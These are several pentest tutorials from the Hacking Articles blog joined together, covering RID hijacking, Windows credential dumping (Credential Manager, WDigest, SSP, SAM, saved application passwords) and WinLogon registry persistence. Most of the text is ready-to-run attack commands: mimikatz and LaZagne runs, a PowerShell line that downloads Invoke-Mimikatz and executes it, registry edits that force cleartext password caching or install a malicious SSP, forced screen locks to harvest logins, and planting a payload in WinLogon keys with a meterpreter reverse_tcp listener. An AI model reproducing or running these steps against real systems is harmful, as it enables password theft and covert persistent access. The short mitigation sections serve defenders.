As you’ve seen in the above step, the guest’s RID is 500 and the password is 123, so we logged in as a guest to get the CMD with Administrator privilege on the target machine. Here we are going to use the impacket tool to get the CMD shell of the remote machine.

cd /impacket/example
./psexec.py Guest:123@192.168.1.107

As you can observe that we have obtained CMD Shell as “nt authority /system” i.e CMD as an administrator account.

Rid-Hijacking: Empire

RID hijacking is also possible using empire but this module is not available in Empire project you need to clone it module from Github.

git clone https://github.com/EmpireProject/Empire.git
git clone https://github.com/r4wd3r/RID-Hijacking.git

once both programs get downloaded, fetch the Invoke-RIDHijacking.ps1 file from inside /RID-Hijacking/modules/empire/data/module_source/persistence into /root/Empire/data/module_source/persistence.

cd RID-Hijacking/modules/empire/data/module_source/persistence
cp Invoke-RIDHijacking.ps1 /root/Empire/data/module_source/persistence

Also copy the rid_hijack.py from /RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated into /root/Empire/lib/modules/powershell/persistence/elevated

cd RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated
cp rid_hijack.py /root/Empire/lib/modules/powershell/persistence/elevated

Once you are done with configuration, then launch the module to start the attack, this will initialise the just like Metasploit. First, identify the status of the guest account and then hijack RID =500 for guest user.

usemodule persistence/elevated/rid_hijack*
set UserGuest True
set Password 123
set Enable True
execute

Again repeat the above step to connect CMD of victim’s machine assure that you should have a privilege shell.

Reference

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Persistence: RID Hijacking appeared first on Hacking Articles.

In this article, we learn about dumping system credentials by exploiting credential manager. We will talk about various methods today which can be used in both internal and external penetration testing.

Table of Content:

• Introduction to credentials manager
• Accessing credential manager
• Metasploit
• Empire
• Credentialfileview
• PowerShell
• Mitigation
• Conclusion

Introduction to Credential Manager

Credential Manager was introduced with Windows 7. It is like a digital vault to keep all of your credentials safe. All of the credentials are stored in a credentials folder which you will find at this location – %Systemdrive%\Users\<Username>\AppData\Local\Microsoft\Credentials and it is this folder that credential manager accesses. it also allows you to add, edit, delete, backup and even restore the passwords.

Credentials saved in credential manager are of two types:

• Web credentials: As Edge and widows are the product of the same company, credentials manager has access to the stored information of Edge browser too, in order to increase safekeeping of saved credentials. It also stores the password of order application provided by Microsoft such as skype, Microsoft office, etc.
• Windows credentials: Under this category, all the windows login credentials can be found. Along with any system that is connected in the network.

Applications which are run by windows and has your credentials saved will automatically be saved in credential manager. Even when you update them, change is noted by and updated in credential manager too.

Accessing Credential Manager

To access credential manager, you can simply search it up in the start menu or you can access it bu two of the following methods:

• You can open control panel > user accounts > credential manager
• You can also access it through the command line with the command vaultcmd and its parameters.

When you connect to another system in the network as using any method like in the following image:

And while connecting when you provide the password and store it for later use too then these credentials are saved in credential manager.

Irrespective of website and its security, when you save any password in the edge or any other application such as skype or outlook, it’s password too gets saved in credential manager. For instance, we have stored Gmail’s password in our practice as shown in the image below:

You can confirm from the following image that the password is indeed saved.

And now, when you access credential manager, using any method, you will find that in windows credentials tab all the system, network passwords are stored.

And under the web credentials tab there are will be application’s passwords and the passwords saved in edge will be saved.

Metasploit

Now all these credentials can be dumped with simple methods. Once you have a session through Metasploit, all you have to do is upload mimikatz and run it. Mimikatz is an amazing credential dumping tool. We have covered mimikatz in detail in one our previous articles, to read that article click here.

And to run mimikatz remotely through Metasploit session, use the following command:

upload /root/Desktop/mmikatz.exe
shell
cd <location of the uploaded file in the target system>
mimikatz.exe

And once the mimikats is executed successfully, you will get credentials from cred manager as shown in the image above.

Empire

Similarly, while using empire, you can dump the credentials by downloading Lazagne.exe directly in the target system and then manipulatinthe lagazne.exe file to get all the credentials. LaZange is on eof the best credential dumping tool. We have covered LaZagne in detail in one our previous articles, to read that article click here.

Use the following commands to dump the credentials with this method :

shell wget https://github.com/AlessandrZ/LaZagne/releases/download2.4.3/lazagne.exe -outfile lazagne.exe
shell wget
shell dir
shell ./lazagne.exe all

After the execution of commands, you can see that the passwords have been retrieved as shown in the following image:

CredentialsFileView

Our next method is using a third-party tool, i.e. credentialfileview. This tool is very effective when it comes to internal penetration testing. To use this tool, simply download it and launch it. After launching itself, it will ask you for the windows password.

Once you provide the password, it will give you all the credentials you need as shown in the image below:

Windows PowerShell

This method of password dumping can prove itself useful in both internal and external pentesting. In this method, you have to run a script in windows powershell. You will find the script here. And once you run the script you will have all the web credentials as shown in the image below:

You can also use powershell remotely to dump credentials with the help of Metasploit. It is very simple as you just have to run a combination of following commands after you have your session:

load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials

And just like that with the help of powershell commands, you will have the desired credentials.

Mitigation

Following are the measures you can use to keep your passwords safe:

• DO NOT save passwords in your system, browser or any other application
• Use different passwords for every account
• If you have trouble remembering passwords then instead of keeping them in clear text in your system, use an online password manager to keep them safe.
• Use the latest version of the operating system and applications.
• Manually go to the login page instead of following a link.
• Keep firewall/defender enabled
• Keep you employees/employers aware

Conclusion  

As you have noticed from our article the even though this feature of credential manager that is provided by windows is convenient, it is not secure and once the attacker has the access of your system then these credentials are waiting to be theirs as there is no security layer added to credential manager. It is important to be aware of every feature your operating system is providing just so you can save yourself. Hence, it is important to know how to access the credential manager and how to operate it and how it can be exploited.

We live in a cyber active world and there are login credentials for everything, one can’t remember every credential ever. Though credential manager is utility makes it easy for us and takes the responsibility of saving the passwords, but at what expense?

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the Covid-19. Take Care and be Healthy and Keep Hacking!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: Windows Credential Manager appeared first on Hacking Articles.

This is our third article in the series of Credential Dumping. In this article, we will manipulate WDigest.dll in order to retrieve the system credentials. The methods used in this article are for both internal and external penetration testing.

Table of Content:

• Introduction to WDigest
• Working of WDigest.dll
• Manual
• PowerShell
• Powershell via meterpreter
• Metasploit Framework
• PowerShell Empire
• Mitigation
• TL; DR

Introduction to Wdigest

WDigest.dll was launched through Windows XP was specifically crafted for HTTP and SASL authentication. Basically, it’s work was to send confirmation of secret keys in order to authenticate the said protocol. The security attributes of NTLM protocol were applied to this DLL file as it’s a challenge/response protocol too. WDigest protocol is enabled in Windows XP — Windows 8.0 and Windows Server 2003 — Windows Server 2012 by default, which allows credentials to be saved in clear text in LSAS file. Windows 10, Windows Server 2012 R2 and Windows Server 2016 doesn’t have this protocol active. And it also released a patch for earlier versions.

Working of WDigest.dll

As it is a challenge-response protocol, it important to understand how it works. Such protocols demand a validating server that creates a challenge for them. The said challenge has incalculable data. A is key is obtained from the user’s password which is further used to encrypt the challenge and to craft a response. A reliable service can then validate the user processes by comparing to the encrypted response that is received by the client and if the responses match, then the user is authenticated.

Now that we have understood what exactly a WDigest protocol is and how it works, let’s get to practical of how to exploit it.

Manual

Our first method to exploit WDigest in to dump the desired credentials is manual. Such a method comes handy in white box pentesting. In this method, download mimikatz and run the following commands :

privilege::debug
sekrusla::wdigest

As you can then see that the result of the above commands didn’t bear a fruit because WDigest protocol wasn’t active. To activate the said protocol, use the following command:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

The above command will create a file called UseLogonCredetnial in the WDigest folder in the registry and simultaneously sets it binary value to 1 as you can in the image below:

The above step has just enabled WDigest in the system. Which will allow the password to be saved in memory that too in clear texts. And now these passwords can be retrieved sneakily as you will see further in this article.

For now, we need to update the policy that we just entered in the registry using the following command:

gpupdate /force

Now, if you launch mimikatz and run the following commands then you will have the credentials.

privilege::debug
sekurlsa::wdigest

PowerShell

In this method, we will be invoking PowerShell scripts in the system. This script will further help us get our hands on the credentials.

Download WdigestDowngrade.ps1

Simply launch the PowerShell Command Prompt and run the following commands:

Import-Module .\WdigestDowngrade.ps1
Invoke-WdigestDowngrade
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

Once the above commands are executed successfully, run the following command to dump the credentials.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

And as you can see, we got the credentials.

PowerShell via Meterpreter

In this method, we will be invoking PowerShell script in our meterpreter session. This script will further help us get our hands on the credentials. When you have a meterpreter session, run the following commands to create the UseLogonCredential file and make changes in the registry key.

reg enumkey -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest
load powershell
powershell_import /root/Desktop/Invoke-WdigestDowngrade.ps1
powershell_execute Invoke-WdigestDowngrade

After the above commands create the UseLogonCredential file as required and then you can launch mimikatz to dump the credentials using the following commands:

Download Invoke Mimikatz.ps1

load powershell
powershell_import /root/Invoke-Mimikatz.ps1
powershell_execute Invoke-Mimikatz -CredsDump

Metasploit Framework

Our next method is an excellent method to dump the credentials remotely which often a requirement in grey box pentesting. Once you have your meterpreter session via Metasploit, remember to background the session and then you can execute wdigest_caching exploit to make the changes in WDigest folder which we just did manually in our previous method by using the following commands:

use post/windows/manage/wdigest_caching
set session 1
execute

Then further use the load kiwi module to dump the credentials. For doing so, type :

load kiwi
creds_wdigest

And yes! We got our credentials.

PowerShell Empire

When you have a session through Empire, use the post exploit wdigest_downgrade to create the UseLogonCredential file in wdigest folder and its registry key value i.e. 1 with the help of following commands:

usemodule management/wdigest_downgrade*
execute

Once the above post exploit is executed successfully, you can use another build in post exploit to dump the credentials with the following set of commands:

usemodule credentials/mimikatz/command*
set Command sekurlsa::wdigest
execute

And after the execution of the above command, you have the credentials.

Mitigation

Following are the steps one can take in order to secure themselves from this scenario:

• Make sure the there is no UseLogonCredential file in your system
• If you are using the older versions of windows then make sure that windows us updates with the patch
• UseLogonCredential registry keys values should be set to 0 to completely disable this protocol.
• Regularly check the registry key value to make sure that you have not been the victim. 

TL; DR

Understanding the very basics of your operating systems such as windows, allow you to be more secure in this cyber world. Knowing how endpoints are put together to work perfectly for your convenience is important as a seemingly minor change can make you vulnerable. Such as WDigest saves all the passwords in memory on the clear text which puts the credentials of the user at risk. And this thought made us take a stab on credential dumping by manipulating WDigest. So, through with mimikatz, Metasploit framework and other such tools that we have mentioned above can leverage your credentials both locally and remotely and can even allow the attacker to use them to their advantage. An attacker who is able to get administrator privileges of your system can modify the values in the registry and dump the credentials as shown in the article above using Mimikatz, Metasploit, Empire, and PowerShell scripts.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: WDigest appeared first on Hacking Articles.

In this article, we will dump the windows login credentials by exploiting SSP. This is our fourth article in the series of credential dumping. Both local and remote method is used in this article to cover every aspect of pentesting.

Table of content:

• Introduction to Security Support Provider (SSP)
• Manual
• Mimikatz
• Metasploit Framework
• Kodiac

Introduction to Security Support Provider

Security Support Provider (SSP) is an API used by windows to carry out authentications of windows login. it’s DLL file that provides security packages to other applications. This DLL stack itself up in LSA when the system starts; making it a start-up process. After it is loaded in LSA, it can access all of the window’s credentials. The configurations of this file are stored in two different registry keys and you find them in the following locations:

HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

Manual

The first method that we are going to use to exploit SSP is manual. Once the method is successfully carried out and the system reboots itself, it will dump the credentials for us. These credentials can be found in a file that will be created upon user login with the name of kiwissp. This file can find in registry inside hklm\system\currentcontrolset\control\lsa.

The first step in this method is to copy the mimilib.dll file from mimikatz folder to the system32 folder. This file is responsible for creating kiwissp file which stores credentials in plaintext for us.

Then navigate yourself to hklm\system\currentcontrolset\control\lsa. And here you can find that there is no entry in Security Packages as shown in the image below:

The same can be checked with the following PowerShell command:

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

Just as shown in the image below, there is no entry. So, this needs to be changed if want to dump the credentials. We need to add all the services that helps SSP to manage credentials; such as Kerberos, wdigest etc. Therefore we will use the following command to make these entries:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f

And then to confirm whether the entry has been done or not, use the following command:

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

You can then again navigate yourself to hklm\system\currentcontrolset\control\lsa  to the enteries that you just made.

Now, whenever the user reboots their PC, a file with the name of kiwissp.log will be created in system32. Then this file will have your credentials stored in cleartext. Use the following command to read the credentials:

type C:\Windows\System32\kiwissp.log

Mimikatz

Mimikatz provides us with a module that injects itself in the memory and when the user is signed out of the windows, then upon signing in the passwords are retrieved from the memory with the help of this module. For this method, just load mimikatz and type:

privilege::debug
misc::memssp

Running the above commands will create mimilsa.log file in system32 upon logging in by the user. To read this file use the following command;

type C:\Windows\System32\mimilsa.log

Metasploit Framework

When dumping credentials remotely, Metasploit really comes handy. The ability of Metasploit providing us with kiwi extension allows us to dump credentials by manipulating SSP just like our previous method. Now when you have meterpreter session through Metasploit use load kiwi command to initiate kiwi extension. And then to inject the mimikatz module in memory use the following command:

kiwi_cmd misc::memssp

Now the module has been successfully injected in the memory. As this module creates the file with clear text credential when the user logs in after the memory injection; we will force the lock screen on the victim so that after login we can have our credentials. For this run the following commands:

shell
RunDll32.exe user32.dll,LockWorkStation

Now we have forced the user to logout the system. Whenever the user will log in our mimilsa file will be created in the system32 and to read the file use the following command:

type C:\Windows\System32\mimilsa.log

Kodiac

Just like Metasploit, Kodiac too provides us with similar mimikatz module; so, let’s get to dumping the credentials.

Once you have a session with kodiac, use the following exploit to inject the payload in the memory:

use mimikatz_dynwrapx
set MIMICMD misc::memssp
execute

Once the above exploit has successfully executed itself, use the following commands to force the user to sign out of the windows and then run the dll command to read the mimilsa file:

cmdshell 0
RunDll32.exe user32.dll,LockWorkStation
type mimilsa.log

As shown in the above image, you will have your credentials.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: Security Support Provider (SSP) appeared first on Hacking Articles.

In this article, were learn how passwords are stored in windows and out of the methods used to hash passwords in SAM, we will focus on LM and NTLM authentications. And then we learn how to dump these credential hashes from SAM.

Table of Content

• Introduction to SAM
• How passwords are stored?
• LM Authentication
• NTLM Authentication
• PwDump7
• SamDump2
• Impacket
• Metasploit Framework
  • HashDump
  • Credential_collector
  • Load_kiwi (Mimikatz)
  • Invoke-PowerDump.ps1
  • Get-PassHashes.ps1
• Kodiac
• PowerShell Empire
  • Mimikatz/sam
  • Credential/powerdump
• Powershell
• LaZagne
• Decrypting hash: John The Ripper

Introduction to SAM

SAM is short for Security Account manager which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored SAM. It is the responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the database maintained in SAM. SAM starts running in the background as soon as the windows startup. SAM is found in C:\Windows\System32\config and passwords that are hashed and saved in SAM can finding registry, just go to the registry and navigate yourself to HKEY_LOCAL_MACHINE\SAM               

How are Passwords stored in Windows?

To know how passwords are saved in windows, we will first need to understand what are LM, NTLM v1 & v2, Kerberos.

LM authentication

LAN Manager (LM) authentication was developed by IBM for Microsoft’s Windows Operating Systems. The security it provides is considered hackable today. It converts your password into a hash by breaking it in two chunks of seven characters. And then further encrypting each chunk. It is not case sensitive either, which is a huge drawback. As this method coverts the whole thing into uppercase, so when the attacker is applying any attack like brute force or dictionary; they can altogether avoid the possibility of lowercase. The key it is using to encrypt is 56-bit DES which now can be easily hacked.

NTLM authentication

NTLM authentication was developed to secure your systems as LM proved to be insecure in time. NTLM’s base is a challenge-response mechanism. It uses three components – nonce (challenge), response and authentication.

When any password is stored in windows, NTLM starts working by encrypting the password and the storing the hash of the said password while it disposes of the actual password. And it further sends the username to the server, then the server creates a 16-byte numeric string, which is random, namely nonce and sends it to the client. Now, the client will encrypt the nonce using the hash string of the password and send the result back to the server. This process is called a response. These three components (nonce, username and response) will be sent to Domain Controller. The Domain Controller will recover the password using hash from the Security Account Manager (SAM) database. Furthermore, the domain controller will check if the nonce and response in case they match, Authentication turns out to be successful.

Working of NTLM v1 and NTML v2 is same, although there are few differences such as NTML v1 is MD4 and v2 is MD5 and in v1 C/R Length is 56 bits + 56-bit +16 bit while v2 uses 128 bits. When it comes to C/R Algorithm v1 uses DES (ECB mode) and v2 is HMAC_MD5. and lastly, in v1 C/R Value Length 64 bit + 64 bit + 64 bit and v2 uses 128 bits.

Now as we have understood these hashing systems, let’s focus on how to dump them. The methods we will focus on are best suited for both internal and external pen-testing. Let’s begin!

PwDump7

This tool is developed by Tarasco and you can download it from here. This tool extracts the SAM file from the system and dumps its credentials. To execute this tool just run the following command in command prompt after downloading:

PwDump7.exe

And as a result, it will dump all the hashes stored in SAM file as shown in the image above.

Now, we will save the registry values of the SAM file and system file in a file in the system by using the following commands:

reg save hklm\sam c:\sam
reg save hklm\system c:\system

We saved the values with the above command to retrieve the data from the SAM file.

SamDump2

Once you have retrieved the data from SAM, you can use SamDump2 tool to dump its hashes with the following command:

samdump2 system sam

Impacket

Impacket tool can also extract all the hashes for you from the SAM file with the following command:

./secretsdump.py -sam /root/Desktop/sam -system /root/Desktop/system LOCAL

Metasploit Framework: HashDump

When you have a meterpreter session of a target, just run hashdump command and it will dump all the hashes from SAM file of the target system. The same is shown in the image below:

Another way to dump hashes through hashdump module is through a post exploit that Metasploit offers. To use the said exploit, use the following set of commands:

use post/windows/gather/hashdump
set session 1
exploit

Metasploit Framework: credential_collector

Another way to dump credentials by using Metasploit is via another in-built post exploit. To use this exploit, simply background your session and run the following command:

use post/windows/gather/credential/credential_collector
set session 1
exploit

Metasploit Framework: load kiwi

The next method that Metasploit offers are by firing up the mimikatz module. To load mimikatz, use the load kiwi command and then use the following command to dump the whole SAM file using mimikatz.

lsa_dump_sam

Hence, you have your passwords as you can see in the image above.

Metasploit Framework: Invoke-Powerdump.ps1

Download Invoke-Powerdump Script

The method of Metasploit involves PowerShell. After getting the meterpreter session, access windows PowerShell by using the command load PowerShell. And then use the following set of commands to run the Invoke-PowerDump.ps1 script.

powershell_import /root/Invoke-PowerDump.ps1
powershell_execute Invoke-PowerDump.ps1

Once the above commands execute the script, you will have the dumped passwords just as in the image above.

Metasploit Framework: Get-PassHashes.ps1

Download Get-PassHashes Script

Again, via meterpreter, access the windows PowerShell using the command load PowerShell. And the just like in the previous method, use the following commands to execute the scripts to retrieve the passwords.

powershell_import GetHashes.ps1
powershell_execute Get-PassHashes.ps1

And VOILA! All the passwords have been retrieved.

Kodiac

Once you have the session by Kodiac C2, use the hashdump_sam module to get passwords as shown below:

use hashdump_sam
execute

All the hashes from the SAM file will be dumped as shown in the above image.

Powershell Empire: mimikatz/sam

Once you have the session through the empire, interact with the session and use the mimikatz/sam module to dump the credentials with help of following commands:

usemodule credentials/mimikatz/sam
execute

This exploit will run mimikatz and will get you all the passwords you desire by dumping SAM file.

Powershell Empire: credentials/powerdump

Empire offers us with yet another exploit that dumps the credentials from the victim’s system. This module does not invoke mimikatz like the previous method. To uses this exploit, type:

usemodule credentials.powerdump
execute

Yes!! You will have the hashes.

PowerShell

Download Invoke-Powerdump Script

This method is an excellent one for local testing, AKA internal testing. To use this method, simply type the following in the Powershell:

Import-Module <'path of the powerdump script'>
Invoke PowerDump

And, it will dump all the credentials for you.

LaZAgne

LaZage is an amazing tool for dumping all kinds of passwords. We have dedicatedly covered LaZagne in our previous article. To visit the said article, click here. Now, to dump SAM hashes with LaZagne, just use the following command:

lazagne.exe all

Yay!!! All the credentials have been dumped.

Decrypting Hash: John The Ripper

John The Ripper is an amazing hash cracking tool. We have dedicated two articles on this tool. To learn more about John The Ripper, click here – part 1, part 2. Once you have dumped all the hashes from SAM file by using any of method given above, then you just need John The Ripper tool to crack the hashes by using the following command:

john –format=NT hash –show

And as you can see, it will reveal the password by cracking the given hash.

The article focuses on dumping credentials from windows SAM file. Various methods have been shown using multiple platforms to successfully dump the credentials. To secure yourself you first must learn how a vulnerability can be exploited and to what extent. Therefore, such knowing such methods and what they can do is important.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: SAM appeared first on Hacking Articles.

This is a sixth article in the Credential Dumping series. In this article, we will learn how we can dump the credentials from various applications such as CoreFTP, FileZilla, WinSCP, Putty, etc.

Table of Content:

• PowerShell Empire: Session Gropher
• Credential Dumping: CoreFTP
  • Metasploit Framework
• Credential Dumping: FTP Navigator
  • Metasploit Framework
  • Lazagne
• Credential Dumping: FileZilla
  • Metasploit Framework
• Credential Dumping: HeidiSQL
  • Metasploit Framework
• Credential Dumping: Emails
  • Mail Pass View
• Credential Dumping: Pidgin
  • Metasploit Framework
• Credential Dumping: PSI
  • LaZagne
• Credential Dumping: PST
  • PST Password
• Credential Dumping: VNC
  • Metasploit Framework
• Credential Dumping: WinSCP
  • LaZagne
  • Metasploit Framework

PowerShell Empire

Empire provides us with a with a module that allows us to retrieve the saved credentials from various applications such as PuTTY, WinSCP, etc. it automatically finds passwords and dumps them for you with requiring you to do anything. Once you have your session in the empire, use the following commands to execute the module:

usemodule credentials/sessiongopher
execute

And as you can see in the image above and below, it successfully retrieves passwords of WinSCP, PuTTy.

Now we will focus on fewer applications and see how we can retrieve their passwords. We will go onto the applications one by one. Let’s get going!

CoreFTP: Metasploit Framework

Core FTP server tool is made especailly for windows. It lets you send and receive files over the network. for this transfer of files, it used FTP protocol which makes it relatively easy to use irrelevant of the Operating System.

With the help of metasploit we can dump the credentials saved in the registry from the target system, the location the passwords is HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites. You can run the post-module after you have a session and run it, type:

use post/windows/gather/credentials/coreftp
set session 1
exploit

FTP Navigator: LaZagne

Just like Core FTP, FTP navigator is FTP client that make transfer, editing, renaming of files easy over the network. it also allows you to keep the directories in sync for both local and remote users. When using the command lazagne.exe all and you will have the FTPNavigator as shown below:

FTPNavigator: Metasploit Framework

The credentials of FTPNavigator can also be dumped using Metasploit as there is an in-built exploit for it. To use this post exploit, type:

use post/windows/gather/credetnials/ftpnavigator
set session 1
exploit

As you can see in the image above, as expected we have the credentials.

FileZilla: Metasploit Framework

FileZilla is another open-source client/server software that runs on FTP protocol. it is compatible with windows, Linux and MacOS. it is again used for transfer or editing or replacing the files in a network. We can dump its credentials using Metasploit and to do so, type:

use post/multi/gather/filezilla_client_cred
set session 1
exploit

And so, we have successfully retrieved the credentials

HeidiSQL: Metasploit Framework

It is an open-source tool for MySQL, MsSQL, PostgreSQL, SQLite. Numerous sessions with connections can be saved along with the credentials, when using HeidiSQL. it also lets you run multiple sessions in a single window. managing od database is pretty easy if using this software. Again, using Metasploit we can get our hands on it credentials by using the following post exploit:

use post/windows/gather/creddtnitals/heidisql
set session 1
exploit

Email: Mail PassView

All the email passwords that are stored in the system can retrieved with the help of the tool named Mail PassView. This tool is developed by nirsoft and is best suited for internal pentesting. Simple download the software from here. Launch the tool to get the credentials as shown below:

Pidgin: Metasploit Framework

Pidgin is an instant messaging software that allows you to chat with multiple networks. It is compatible with every Operating System. it also allows you to transfer files. There is a in-built post exploit for pidgin, in Metasploit, too. To initiate this exploit, use the following commands:

use post/multi/gather/pidgin_cred
set session 1
execute

And all the credentials will be on your screen.

PSI: LaZagne

PSI is an instant messenger that works over XMPP network. it also allows you to transfer files. it is highly customizable and comes in various languages. Using lazagne.exe chat command in LaZagne you can dump it’s password as shown in the image below:

PST: PstPassword

Nirsoft provides a tool which lets you retrieve all the PST passwords from Outlook. You can download this tool from here. Simple launch the tool and you will have the passwords as shown below :

VNC: Metasploit Framework

VNC is a remote access software which allows you to access your device from anywhere in the world. VNC passwords can be easily retrieved by using metasploit and to do so, type:

use post/windows/gather/credentials/vnc
set session 2
exploit

WinSCP: LaZagne

WinSCP is FTP client which is based on SSH protocol from PuTTY. It has a graphical interface and can be operated in multiple languages. it also acts as a remote editor. Both LaZagne and Metasploit helps us to retrieve it’s passwords. In LaZagne, use the command lazagne.exe all and it will dump the credentials as shown in the image below:

WinSCP: Metasploit Framework

To retrieve the credentials from Metasploit, use the following exploit:

use post/windows/gather/credentials/winscp
set session 1
exploit

This way, you can retrieve credentials of multiple applications.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: Applications appeared first on Hacking Articles.

In this article, we are going to describe the ability of the WinLogon process to provide persistent access to the Target Machine.

Table of Content

• Introduction
• Configurations used in Practical
• Default Registry Key Values
• Persistence using WinLogon
  • Using Userinit Key
  • Using the Shell Key
• Detection
• Mitigation

Introduction

The Winlogon process is a very important part of the Windows operating system, and Windows will be unusable without it.

This process performs many important tasks related to the Windows sign-in process. For example, when you sign in, the Winlogon process is responsible for loading your user profile into the registry. Hence, each Windows user account is dependent on WinLogon to use the keys under HKEY_CURRENT_USER which is unique for each user account.

Winlogon has special hooks into the system and watches to see if you press Ctrl+Alt+Delete. This is known as the “secure attention sequence”, and it’s why some PCs may be configured to require you to press Ctrl+Alt+Delete before you sign in. This combination of keyboard shortcuts is constantly caught by Winlogon, which guarantees you’re signing in on a safe desktop where different programs can’t monitor the password you’re typing or impersonate a sign-in dialog.

The Windows Logon Application additionally monitors the keyboard and mouse action and is liable for locking your PC and starting screen savers after a time of no activity.

Microsoft Official site provides a more detailed, technical list of Winlogon’s responsibilities.

Configurations used in Practical

Attacker:

    OS: Kali Linux 2020.1

    IP: 192.168.1.112

Target:

    OS: Windows 10

    IP: 192.168.1.104

Default Registry Key Values

Now as discussed in the introduction, the WinLogon process controls the HKEY_CURRENT_USER. But being a Windows Propriety Software, its registry values are located in the HKEY_LOCAL_MACHINE. If we want to take a look at the Registry Key Values for WinLogon, we will have to open the Registry Editor. This can be achieved by typing Regedit in the Run Panel. Then Traverse to the following Location:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Now here among a lot of other keys we see that we have keys named Userint and Shell of REG_SZ type. We will be using these keys to gain persistence over this machine. The scenario that can be related here is that the attacker gains a meterpreter session over the Target Machine here. The attacker can use any method of their choice. Then he uses the meterpreter session to alter the Registry Keys in WinLogon to convert its session into a persistence session. 

Persistence using Userinit Key

Transfering Malicious Executable

We created a malicious executable file named raj.exe using the msfvenom tool. More about that here. Now using the meterpreter session that we already obtained, we transfer this malicious executable to the Target Machine. We will be using the upload command of the meterpreter for this. After the file is successfully uploaded to the Target Machine, we ran the shell command.

upload /root/raj.exe

Modifying Registry Values

Since we have the shell of the Target System, we used the “reg query” command to get information about the Userinit Key of WinLogon. We see that it has the default value we saw earlier. Now using the “reg add” command we modified the key value to hold the malicious executable as well.

shell
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, raj.exe" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit

We ran the “reg query” command again to ensure that the values are indeed modified.

We can also verify the modification manually here as shown in this image below.

Gaining Persistent Shell

Now that we have made the changes in the registry. We should be getting a persistent shell as soon as the WinLogon is triggered. Although we need to have a listener set up for the session that is generated. The listener should have the same configurations as IP Address and Port that were used in crafting the payload. Here we can see that we have a persistent shell.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 4444
exploit

Persistence using Shell Key

We got our persistence using the Userinit key. Now let’s focus on another key that can be used to achieve persistence over the Target Machine. It is the Shell key. It by default holds the explorer.exe as shown in the given below.

Modifying Registry Values

As we did in the previous practices, we will be gaining a meterpreter session, then we will be transferring the payload over to the Target Machine using the upload command. Then we will be adding the name of the executable in the Registry Value using reg add command.

upload /root/raj.exe
shell
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, raj.exe" /f

We can verify that the payload is indeed added to the Shell Key by going to the location in the Registry Editor

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Gaining Persistent Shell

Now that we have made the changes in the registry. We should be getting a persistent shell as soon as the WinLogon is triggered. Although we need to have a listener set up for the session that is generated. The listener should have the same configurations as IP Address and Port that were used in crafting the payload. Here we can see that we have a persistent shell.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 4444
exploit

Detection

• Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc.
• Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempted at persistence, including listing current Winlogon helper values.
• New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
• Look for abnormal process behaviour that may be due to a process loading a malicious DLL.
• Data and events should not be viewed in isolation but as part of a chain of behaviour that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.

Mitigation

• Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting tools like AppLocker that are capable of auditing and/or blocking unknown DLLs.
• Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the COVID-19. I am writing this article while Working from home. Take care and be Healthy!

MITRE|ATT&CK

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

The post Windows Persistence using WinLogon appeared first on Hacking Articles.

